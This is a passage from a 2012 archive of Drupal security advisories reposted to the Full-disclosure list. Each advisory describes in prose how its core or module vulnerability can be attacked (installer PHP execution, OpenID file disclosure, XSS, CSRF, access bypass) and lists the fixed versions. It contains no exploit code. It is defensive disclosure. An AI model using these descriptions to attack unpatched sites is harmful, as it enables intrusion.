[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/time_spent
[4] http://drupal.org/project/time_spent
[5] http://drupal.org/user/426464
[6] http://drupal.org/user/36762
[7] http://drupal.org/user/181798
[8] http://drupal.org/contact
[9] http://drupal.org/security-team
[10] http://drupal.org/writing-secure-code
[11] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CORE-2012-003 - Drupal core - Arbitrary PHP code execution and Information disclosure
View online: http://drupal.org/node/1815912

  * Advisory ID: DRUPAL-SA-CORE-2012-003
  * Project: Drupal core [1]
  * Version: 7.x
  * Date: 2012-October-17
  * Security risk: Highly critical [2]
  * Exploitable from: Remote
  * Vulnerability: Information Disclosure, Arbitrary PHP code execution

DESCRIPTION
-----------
Multiple vulnerabilities were discovered in Drupal core.

Arbitrary PHP code execution

A bug in the installer code was identified that allows an attacker to re-install Drupal using an external database server under certain transient conditions. This could allow the attacker to execute arbitrary PHP code on the original server.

This vulnerability is mitigated by the fact that the re-installation can only be successful if the site's settings.php file or sites directories are writeable by or owned by the webserver user. Configuring the Drupal installation to be owned by a different user than the webserver user (and not to be writeable by the webserver user) is a recommended security best practice [3]. However, in all cases the transient conditions expose information to an attacker who accesses install.php, and therefore this security update should be applied to all Drupal 7 sites.

Information disclosure - OpenID module

For sites using the core OpenID module, an information disclosure vulnerability was identified that allows an attacker to read files on the local filesystem by attempting to log in to the site using a malicious OpenID server.

CVE: Requested

VERSIONS AFFECTED
-----------------
  * Drupal core 7.x versions prior to 7.16.

Drupal 6 is not affected.

SOLUTION
--------
Install the latest version:
  * If you use Drupal 7.x, upgrade to Drupal core 7.16 [4].

If you are unable to deploy the security release immediately, removing or blocking access to install.php is a sufficient mitigation step for the arbitrary PHP code execution vulnerability.

Also see the Drupal core [5] project page.

REPORTED BY
-----------
  * The arbitrary PHP code execution vulnerability was reported by Heine Deelstra [6] and Noam Rathaus [7] working with Beyond Security's SecuriTeam Secure Disclosure Program. Heine Deelstra is also a member of the Drupal Security Team.
  * The information disclosure vulnerability in the OpenID module was reported by Reginaldo Silva [8].

FIXED BY
--------
  * The arbitrary PHP code execution vulnerability was fixed by Damien Tournoud [9], David Rothstein [10], Peter Wolanin [11], and Károly Négyesi [12], all members of the Drupal Security Team.
  * The information disclosure vulnerability in the OpenID module was fixed by Reginaldo Silva [13], Christian Schmidt [14], Vojtěch Kusý [15], and Frédéric Marand [16], and by Peter Wolanin [17], David Rothstein [18], Damien Tournoud [19], and Heine Deelstra [20] of the Drupal Security Team.

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [21].

Learn more about the Drupal Security team and their policies [22], writing secure code for Drupal [23], and securing your site [24].

[1] http://drupal.org/project/drupal
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/node/244924
[4] http://drupal.org/node/1815904
[5] http://drupal.org/project/drupal
[6] http://drupal.org/user/17943
[7] http://drupal.org/user/2317662
[8] http://drupal.org/user/2305626
[9] http://drupal.org/user/22211
[10] http://drupal.org/user/124982
[11] http://drupal.org/user/49851
[12] http://drupal.org/user/9446
[13] http://drupal.org/user/2305626
[14] http://drupal.org/user/216078
[15] http://drupal.org/user/56154
[16] http://drupal.org/user/27985
[17] http://drupal.org/user/49851
[18] http://drupal.org/user/124982
[19] http://drupal.org/user/22211
[20] http://drupal.org/user/17943
[21] http://drupal.org/contact
[22] http://drupal.org/security-team
[23] http://drupal.org/writing-secure-code
[24] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-156 - Search API - Cross Site Request Forgery (CSRF)
View online: http://drupal.org/node/1815770

  * Advisory ID: DRUPAL-SA-CONTRIB-2012-156
  * Project: Search API [1] (third-party module)
  * Version: 7.x
  * Date: 2012-October-17
  * Security risk: Less critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Request Forgery

DESCRIPTION
-----------
This module enables you to build searches using a wide range of features, data sources and backends.

The module doesn't sufficiently guard the “enable index” action against Cross Site Request Forgery (CSRF) attacks which could allow an attacker to enable existing search indexes on your site.

This vulnerability is mitigated by the fact that the attacker would need to guess the machine name or ID of a disabled index or server, and a disabled index would have to be connected to an enabled server for the operation to be successful. The impact from such an enabled index has little effect besides using additional resources for indexing because search pages or views related to the index are not automatically enabled. The enabling of a server has no effect unless existing indexes assigned to that server are subsequently enabled as well.

CVE: Requested

VERSIONS AFFECTED
-----------------
  * Search API 7.x-1.x versions prior to 7.x-1.3.

Drupal core is not affected. If you do not use the contributed Search API [3] module, there is nothing you need to do.

SOLUTION
--------
Install the latest version:
  * If you use the Search API module for Drupal 7.x, upgrade to Search API 7.x-1.3 [4]

Alternatively, you can remove the vulnerability without upgrading by moving disabled indexes away from servers:
  * If you have disabled indexes, set them to “< No server >” in the index settings.

Also see the Search API [5] project page.

REPORTED BY
-----------
  * Ivo Van Geertruyen (mr.baileys [6]) of the Drupal Security Team

FIXED BY
--------
  * Ivo Van Geertruyen (mr.baileys [7]) of the Drupal Security Team

COORDINATED BY
--------------
  * Ivo Van Geertruyen (mr.baileys [8]) and Klaus Purer (klausi [9]) of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10].

Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

[1] http://drupal.org/project/search_api
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/search_api
[4] http://drupal.org/node/1815124
[5] http://drupal.org/project/search_api
[6] http://drupal.org/user/383424
[7] http://drupal.org/user/383424
[8] http://drupal.org/user/383424
[9] http://drupal.org/user/262198
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-155 - ShareThis - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1808856

  * Advisory ID: DRUPAL-SA-CONTRIB-2012-155
  * Project: ShareThis [1] (third-party module)
  * Version: 7.x
  * Date: 2012-October-10
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Scripting

DESCRIPTION
-----------
This module enables integration with the ShareThis [3] web service to allow social bookmarking amongst your users.

The module doesn't sufficiently filter JavaScript settings before outputting them.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer sharethis".

CVE: Requested

VERSIONS AFFECTED
-----------------
  * ShareThis 7.x-2.x versions prior to 7.x-2.5.

Drupal core is not affected. If you do not use the contributed ShareThis [4] module, there is nothing you need to do.

SOLUTION
--------
Install the latest version:
  * If you use the ShareThis module for Drupal 7.x, upgrade to ShareThis 7.x-2.5 [5]

Also see the ShareThis [6] project page.

REPORTED BY
-----------
  * Jake Bell [7]

FIXED BY
--------
  * Rob Loach [8], the module maintainer

COORDINATED BY
--------------
  * David Stoline [9] provisional member of the Drupal Security Team
  * Ben Jeavons [10] of the Drupal Security Team
  * Greg Knaddison [11] of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12].

Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15].

[1] http://drupal.org/project/sharethis
[2] http://drupal.org/security-team/risk-levels
[3] http://sharethis.com/
[4] http://drupal.org/project/sharethis
[5] http://drupal.org/node/1808760
[6] http://drupal.org/project/sharethis
[7] http://drupal.org/user/71548
[8] http://drupal.org/user/61114
[9] http://drupal.org/user/329570
[10] http://drupal.org/user/91990
[11] http://drupal.org/user/36762
[12] http://drupal.org/contact
[13] http://drupal.org/security-team
[14] http://drupal.org/writing-secure-code
[15] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-154 - Basic webmail - Multiple vulnerabilities
View online: http://drupal.org/node/1808852

  * Advisory ID: DRUPAL-SA-CONTRIB-2012-154
  * Project: Basic webmail [1] (third-party module)
  * Version: 6.x
  * Date: 2012-October-10
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Scripting, Information Disclosure, Multiple vulnerabilities

DESCRIPTION
-----------
This module allows site users to read and write e-mail through an IMAP mail server.

There are four issues being addressed by this security advisory:
  * The module doesn't sufficiently sanitize data when setting the page title.
  * The module may store Drupal login IDs and passwords in plain text in the data column of the users table.
  * The module doesn't sufficiently sanitize data displayed from email messages.
  * The module allows users who have the 'access basic_webmail' permission to view the e-mail address of other site users.

CVE: Requested

VERSIONS AFFECTED
-----------------
  * Basic webmail 6.x-1.x versions prior to 6.x-1.2.

Drupal core is not affected. If you do not use the contributed Basic webmail [3] module, there is nothing you need to do.

SOLUTION
--------
Install the latest version:
  * If you use the Basic webmail module for Drupal 6.x, upgrade to Basic webmail 6.x-1.2 [4]

Also see the Basic webmail [5] project page.

REPORTED BY
-----------
  * Hunter Fox [6] provisional member of the Drupal Security Team

FIXED BY
--------
  * Jason Flatt [7] the module maintainer
  * Hunter Fox [8] provisional member of the Drupal Security Team

COORDINATED BY
--------------
  * Hunter Fox [9] provisional member of the Drupal Security Team
  * Ben Jeavons [10] of the Drupal Security Team
  * Greg Knaddison [11] of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12].

Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15].

[1] http://drupal.org/project/basic_webmail
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/basic_webmail
[4] https://drupal.org/node/1808616
[5] http://drupal.org/project/basic_webmail
[6] http://drupal.org/user/426416
[7] http://drupal.org/user/4649
[8] http://drupal.org/user/426416
[9] http://drupal.org/user/426416
[10] http://drupal.org/user/91990
[11] http://drupal.org/user/36762
[12] http://drupal.org/contact
[13] http://drupal.org/security-team
[14] http://drupal.org/writing-secure-code
[15] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-153 - Mandrill - Information Disclosure
View online: http://drupal.org/node/1808846

  * Advisory ID: DRUPAL-SA-CONTRIB-2012-153
  * Project: Mandrill [1] (third-party module)
  * Version: 7.x
  * Date: 2012-October-10
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Information Disclosure

DESCRIPTION
-----------
This module enables you to send emails using an external gateway and by default logs the contents of the messages.

An attacker who gains access to the Mandrill dashboard can trigger password reset emails from the Drupal site, get the reset links from the Mandrill logs, and take over an account.

CVE: Requested

VERSIONS AFFECTED
-----------------
  * Mandrill 7.x-1.x versions prior to 7.x-1.2.

Drupal core is not affected. If you do not use the contributed Mandrill [3] module, there is nothing you need to do.

SOLUTION
--------
Install the latest version:
  * If you use the Mandrill module for Drupal 7.x, upgrade to Mandrill 7.x-1.2 [4]

Also see the Mandrill [5] project page.

REPORTED BY
-----------
  * Patrick Dawkins [6]

FIXED BY
--------
  * Lev Tsypin [7] the module maintainer
  * Ned McClain [8] provisional member of the Drupal Security Team

COORDINATED BY
--------------
  * Ned McClain [9] provisional member of the Drupal Security Team
  * Ben Jeavons [10] of the Drupal Security Team
  * Greg Knaddison [11] of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12].

Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15].

[1] http://drupal.org/project/mandrill
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/mandrill
[4] http://drupal.org/node/1807894
[5] http://drupal.org/project/mandrill
[6] http://drupal.org/user/1025236
[7] http://drupal.org/user/54135
[8] http://drupal.org/user/798324
[9] http://drupal.org/user/798324
[10] http://drupal.org/user/91990
[11] http://drupal.org/user/36762
[12] http://drupal.org/contact
[13] http://drupal.org/security-team
[14] http://drupal.org/writing-secure-code
[15] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-152 - Feeds - Access bypass
View online: https://drupal.org/node/1808832

  * Advisory ID: DRUPAL-SA-CONTRIB-2012-152
  * Project: Feeds [1] (third-party module)
  * Version: 7.x
  * Date: 2012-October-10
  * Security risk: Not critical [2]
  * Exploitable from: Remote
  * Vulnerability: Access bypass

DESCRIPTION
-----------
The feeds module enables you to import or aggregate data as nodes, users, taxonomy terms or simple database records.

The module doesn't sufficiently check permissions when creating nodes on behalf of a user.

This vulnerability is mitigated by the fact that an attacker must have control over the source feed, and the Feeds importer must have a field from that feed mapped to the node's author.

/Note: the Feeds module doesn't have a stable release and therefore a Security Advisory would not normally be issued, per the Drupal Security Team policy [3]. However, this issue affects the Mailhandler [4] module, which does have a stable release. For modules with dependencies, maintainers are encouraged to create stable releases only for those modules dependent on stable releases./

CVE: Requested

VERSIONS AFFECTED
-----------------
  * Feeds 7.x-2.x versions prior to 7.x-2.0-alpha6.

Drupal core is not affected. If you do not use the contributed Feeds [5] module, there is nothing you need to do.

SOLUTION
--------
Install the latest version:
  * If you use the Feeds module for Drupal 7.x, upgrade to Feeds 7.x-2.0-alpha6 [6].

Also see the Feeds [7] project page.

REPORTED BY
-----------
  * Iñaki Lopez [8]

FIXED BY
--------
  * Chris Leppanen [9] the module maintainer
  * Lee Rowlands [10] provisional member of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/feeds
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/security-advisory-policy
[4] http://drupal.org/project/mailhandler
[5] http://drupal.org/project/feeds
[6] https://drupal.org/node/1808282
[7] http://drupal.org/project/feeds
[8] http://drupal.org/user/118449
[9] http://drupal.org/user/473738
[10] http://drupal.org/user/395439
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-151 - Commerce Extra Panes - Cross Site Request Forgery
View online: http://drupal.org/node/1802258

  * Advisory ID: DRUPAL-SA-CONTRIB-2012-151
  * Project: Commerce extra panes [1] (third-party module)
  * Version: 7.x
  * Date: 2012-October-3
  * Security risk: Less critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Request Forgery

DESCRIPTION
-----------
This module, an add-on for Drupal Commerce, allows site builders to place one or more nodes in one of the checkout phases of an order.

The module doesn't sufficiently confirm the intent of a site builder when taking certain administrative operations. This could allow an attacker to trick an administrator into unknowingly enabling/disabling a Commerce extra panes pane.

CVE: Requested

VERSIONS AFFECTED
-----------------
  * Commerce extra panes 7.x-1.x versions prior to 7.x-1.1.

Drupal core is not affected. If you do not use the contributed Commerce extra panes [3] module, there is nothing you need to do.

SOLUTION
--------
Install the latest version:
  * If you use the Commerce extra panes module for Drupal 7.x, upgrade to Commerce extra panes 7.x-1.1 [4]

Also see the Commerce extra panes [5] project page.

REPORTED BY
-----------
  * Ivo Van Geertruyen [6] of the Drupal Security Team

FIXED BY
--------
  * Ivo Van Geertruyen [7] of the Drupal Security Team
  * Pedro Cambra [8] the Module Maintainer

COORDINATED BY
--------------
  * Ivo Van Geertruyen [9] of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10].

Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

[1] http://drupal.org/project/commerce_extra_panes
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/commerce_extra_panes
[4] http://drupal.org/node/1802192
[5] http://drupal.org/project/commerce_extra_panes
[6] http://drupal.org/user/383424
[7] http://drupal.org/user/383424
[8] http://drupal.org/user/122101
[9] http://drupal.org/user/383424
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-150 - Twitter Pull - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1802230

* Advisory ID: DRUPAL-SA-CONTRIB-2012-150
* Project: Twitter Pull [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2012-October-03
* Security risk: Less critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

-------- DESCRIPTION --------

Twitter Pull allows you to retrieve tweets from Twitter based on a user or search and display them on your site. It also includes integration with the boxes module to allow for simple placement of twitter feeds on various pages.

The module doesn't sufficiently filter the data coming from Twitter which could result in script injection and XSS attacks.

This vulnerability is mitigated by the fact that Twitter is a generally trusted source and is unlikely to serve malicious content.

CVE: Requested

-------- VERSIONS AFFECTED --------

* Twitter Pull 6.x-1.x versions prior to 6.x-1.3.
* Twitter Pull 7.x-1.x versions prior to 7.x-1.0-rc3.

Drupal core is not affected. If you do not use the contributed Twitter Pull [3] module, there is nothing you need to do.

-------- SOLUTION --------

Install the latest version:

* If you use the Twitter Pull module for Drupal 6.x, upgrade to Twitter Pull 6.x-1.3 [5]
* If you use the Twitter Pull module for Drupal 7.x, upgrade to Twitter Pull 7.x-1.0-rc3 [6]

Also see the Twitter Pull [7] project page.

-------- REPORTED BY --------

* Sylvain Delbosc [8]
* Alex Pott [9]
* Tom Phethean [10]

-------- FIXED BY --------

* Sylvain Delbosc [11]
* Josh Caldwell [12] the module maintainer

-------- COORDINATED BY --------

* Greg Knaddison [13] of the Drupal Security Team

-------- CONTACT AND MORE INFORMATION --------

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [14]. Learn more about the Drupal Security team and their policies [15], writing secure code for Drupal [16], and securing your site [17].

[1] http://drupal.org/project/twitter_pull
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/twitter_pull
[4] http://drupal.org/project/twitter_pull
[5] http://drupal.org/node/1801442
[6] http://drupal.org/node/1801444
[7] http://drupal.org/project/twitter_pull
[8] http://drupal.org/user/174778
[9] http://drupal.org/user/157725
[10] http://drupal.org/user/881620
[11] http://drupal.org/user/174778
[12] http://drupal.org/user/855980
[13] http://drupal.org/user/27
[14] http://drupal.org/contact
[15] http://drupal.org/security-team
[16] http://drupal.org/writing-secure-code
[17] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-149 - Hostip - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1802218

* Advisory ID: DRUPAL-SA-CONTRIB-2012-149
* Project: Hostip [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2012-October-03
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

-------- DESCRIPTION --------

Hostip enables you to query the http://www.hostip.info/ [3] API to get the country / state information based on the user's IP address or a specific IP passed to it.

The module fails to sanitize data retrieved from an untrusted third party source, thereby exposing an arbitrary script injection vulnerability (XSS).

This vulnerability is mitigated by the fact that an attacker must have either gained access to that third party source or use techniques such as DNS spoofing in order to inject malicious data.

CVE: Requested

-------- VERSIONS AFFECTED --------

* Hostip 6.x-2.x versions prior to 6.x-2.2.
* Hostip 7.x-2.x versions prior to 7.x-2.2.

Drupal core is not affected. If you do not use the contributed Hostip [4] module, there is nothing you need to do.

-------- SOLUTION --------

Install the latest version:

* If you use the Hostip module for Drupal 6.x, upgrade to Hostip 6.x-1.2 [5]
* If you use the Hostip module for Drupal 7.x, upgrade to Hostip 7.x-1.2 [6]

Also see the Hostip [7] project page.

-------- REPORTED BY --------

* Klaus Purer [8] of the Drupal Security Team

-------- FIXED BY --------

* Vaibhav Jain [9] the module maintainer

-------- COORDINATED BY --------

* Klaus Purer [10] of the Drupal Security Team

-------- CONTACT AND MORE INFORMATION --------

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/hostip
[2] http://drupal.org/security-team/risk-levels
[3] http://www.hostip.info/
[4] http://drupal.org/project/hostip
[5] http://drupal.org/node/1802046
[6] http://drupal.org/node/1802048
[7] http://drupal.org/project/hostip
[8] http://drupal.org/user/262198
[9] http://drupal.org/user/1159692
[10] http://drupal.org/user/262198
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-148 - OG - Access Bypass
View online: http://drupal.org/node/1796036

* Advisory ID: DRUPAL-SA-CONTRIB-2012-148
* Project: Organic groups [1] (third-party module)
* Version: 7.x
* Date: 2012-September-26
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Access bypass

-------- DESCRIPTION --------

OG (Organic groups) enables users to create and manage their own 'groups'. Each group can have subscribers, and maintains a group home page where subscribers communicate amongst themselves. A group membership can be given immediately upon subscribing, or be pending - waiting for a group administrator to approve it.

OG doesn't properly maintain pending memberships if the user is allowed to edit their own account. In addition, under certain circumstances, a user was able to post to a group which they were not a member of.

There are no additional mitigating factors for these issues.

CVE: Requested

-------- VERSIONS AFFECTED --------

* OG (Organic groups) 7.x-1.x versions prior to 7.x-1.5.

Drupal core is not affected. If you do not use the contributed Organic groups [3] module, there is nothing you need to do.

-------- SOLUTION --------

Install the latest version:

* If you use the OG 7.x-1.x module for Drupal 7.x, upgrade to OG (Organic groups) 7.x-1.5 [4]

Also see the Organic groups [5] project page.

-------- REPORTED BY --------

* Zoltán Tóth [6]
* John Takousis [7]

-------- FIXED BY --------

* Amitai Burstein [8] the module maintainer

-------- COORDINATED BY --------

* Lee Rowlands [9]
* Greg Knaddison [10] of the Drupal Security Team

-------- CONTACT AND MORE INFORMATION --------

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/og
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/og
[4] http://drupal.org/node/1795906
[5] http://drupal.org/project/og
[6] http://drupal.org/user/2126442
[7] http://drupal.org/user/1792608
[8] http://drupal.org/user/57511
[9] http://drupal.org/user/395439
[10] http://drupal.org/user/36762
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-147 - FileField Sources - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1789306

* Advisory ID: DRUPAL-SA-CONTRIB-2012-147
* Project: FileField Sources [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2012-September-19
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

-------- DESCRIPTION --------

The Drupal FileField module lets you upload files from your computer through a CCK field. The FileField Sources module expands on this ability by allowing you to select new or existing files through additional means.

The FileField Sources module contains a persistent cross site scripting (XSS) vulnerability due to the fact that it fails to sanitize user supplied filenames before display.

This vulnerability is mitigated by the fact that malicious users must have the ability to upload files on a field that has the "Reference existing" source enabled.

CVE: Requested

-------- VERSIONS AFFECTED --------

* FileField Sources 6.x-1.x versions prior to 6.x-1.6.
* FileField Sources 7.x-1.x versions prior to 7.x-1.6.

Drupal core is not affected. If you do not use the contributed FileField Sources [3] module, there is nothing you need to do.

-------- SOLUTION --------

Install the latest version:

* If you use the FileField Sources module for Drupal 6.x, upgrade to FileField Sources 6.x-1.6 [4]
* If you use the FileField Sources module for Drupal 7.x, upgrade to FileField Sources 7.x-1.6 [5]

Also see the FileField Sources [6] project page.

-------- REPORTED BY --------

* Disclosed publicly.

-------- FIXED BY --------

* Nathan Haug [7] the module maintainer

-------- COORDINATED BY --------

* Greg Knaddison [8] of the Drupal Security Team
* Michael Hess [9] of the Drupal Security Team

-------- CONTACT AND MORE INFORMATION --------

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

[1] http://drupal.org/project/filefield_sources
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/filefield_sources
[4] http://drupal.org/node/1789300
[5] http://drupal.org/node/1789302
[6] http://drupal.org/project/filefield_sources
[7] http://drupal.org/user/35821
[8] http://drupal.org/user/36762
[9] http://drupal.org/user/102818
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-146 - Simplenews Scheduler - Arbitrary code execution
View online: http://drupal.org/node/1789284

* Advisory ID: DRUPAL-SA-CONTRIB-2012-146
* Project: Simplenews Scheduler [1] (third-party module)
* Version: 6.x
* Date: 2012-September-19
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Arbitrary PHP code execution

-------- DESCRIPTION --------

The Simplenews Scheduler module provides a system for creating automatic email newsletters. These can be set to be sent at a fixed interval, or PHP code can be entered to evaluate a condition for a new newsletter issue to be sent.

The module allows a user with the 'send scheduled newsletters' access to the scheduling form where PHP code may be entered. This code is then executed the next time the site runs cron. A site administrator granting permissions is not given sufficient warning that they are granting this level of access to the site.

This vulnerability is mitigated by the fact that an attacker must have already been granted a role with the permission 'send scheduled newsletters'.

CVE: Requested

-------- VERSIONS AFFECTED --------

* Simplenews Scheduler 6.x-2.x versions prior to 6.x-2.3.

Drupal core is not affected. If you do not use the contributed Simplenews Scheduler [3] module, there is nothing you need to do.

-------- SOLUTION --------

Install the latest version:

* If you use the Simplenews Scheduler module for Drupal 6.x, upgrade to Simplenews Scheduler 6.x-2.4 [4]

Also see the Simplenews Scheduler [5] project page.

-------- REPORTED BY --------

* Sascha Grossenbacher [6]
* Joachim Noreiko [7] the module maintainer

-------- FIXED BY --------

* Joachim Noreiko [8] the module maintainer
* Sascha Grossenbacher [9]

-------- COORDINATED BY --------

* Greg Knaddison [10] of the Drupal Security Team

-------- CONTACT AND MORE INFORMATION --------

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/simplenews_scheduler
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/simplenews_scheduler
[4] http://drupal.org/node/1789274
[5] http://drupal.org/project/simplenews_scheduler
[6] http://drupal.org/user/214652
[7] http://drupal.org/user/107701
[8] http://drupal.org/user/107701
[9] http://drupal.org/user/214652
[10] http://drupal.org/user/36762
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-145 - Imagemenu - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1789260

* Advisory ID: DRUPAL-SA-CONTRIB-2012-145
* Project: Imagemenu [1] (third-party module)
* Version: 6.x
* Date: 2012-September-19
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

-------- DESCRIPTION --------

Imagemenu module allows you to create Drupal menus from image files.

The module doesn't sufficiently escape image file names when rendering menus, allowing a potential XSS attack.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer imagemenu".

CVE: Requested

-------- VERSIONS AFFECTED --------

* Imagemenu 6.x-1.x versions prior to 6.x-1.4.

Drupal core is not affected. If you do not use the contributed Imagemenu [3] module, there is nothing you need to do.

-------- SOLUTION --------

Install the latest version:

* If you use the Imagemenu module for Drupal 6.x, upgrade to Imagemenu 6.x-1.4 [4]

Also see the Imagemenu [5] project page.

-------- REPORTED BY --------

* David Houlder [6]

-------- FIXED BY --------

* Paul Maddern [7], module maintainer
* Marcus Clements [8], module maintainer
* Ben Jeavons [9] of the Drupal Security Team

-------- COORDINATED BY --------

* Michael Hess [10], Ben Jeavons [11], and Greg Knaddison [12] of the Drupal Security Team

-------- CONTACT AND MORE INFORMATION --------

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [13]. Learn more about the Drupal Security team and their policies [14], writing secure code for Drupal [15], and securing your site [16].

[1] http://drupal.org/project/imagemenu
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/imagemenu
[4] http://drupal.org/node/1788726
[5] http://drupal.org/project/imagemenu
[6] http://drupal.org/user/588210
[7] http://drupal.org/user/25159
[8] http://drupal.org/user/190002
[9] http://drupal.org/user/91990
[10] http://drupal.org/user/102818
[11] http://drupal.org/user/91990
[12] http://drupal.org/user/36762
[13] http://drupal.org/contact
[14] http://drupal.org/security-team
[15] http://drupal.org/writing-secure-code
[16] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-144 - Fonecta verify - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1789258

* Advisory ID: DRUPAL-SA-CONTRIB-2012-144
* Project: Fonecta verify [1] (third-party module)
* Version: 7.x
* Date: 2012-September-19
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

-------- DESCRIPTION --------

Fonecta verify provides an interface to retrieve information from the Finnish Fonecta company information database.

The module contains an arbitrary script injection vulnerability (XSS) due to the fact that it fails to sanitize data retrieved from an untrusted third party source.

This vulnerability is mitigated by the fact that an attacker must have either gained access to that third party source or use techniques such as DNS spoofing in order to inject malicious data.

CVE: Requested

-------- VERSIONS AFFECTED --------

* Fonecta verify 7.x-1.x versions prior to 7.x-1.6.

Drupal core is not affected. If you do not use the contributed Fonecta verify [3] module, there is nothing you need to do.

-------- SOLUTION --------

Install the latest version:

* If you use the Fonecta verify module for Drupal 7.x, upgrade to Fonecta verify 7.x-1.6 [4]

Also see the Fonecta verify [5] project page.

-------- REPORTED BY --------

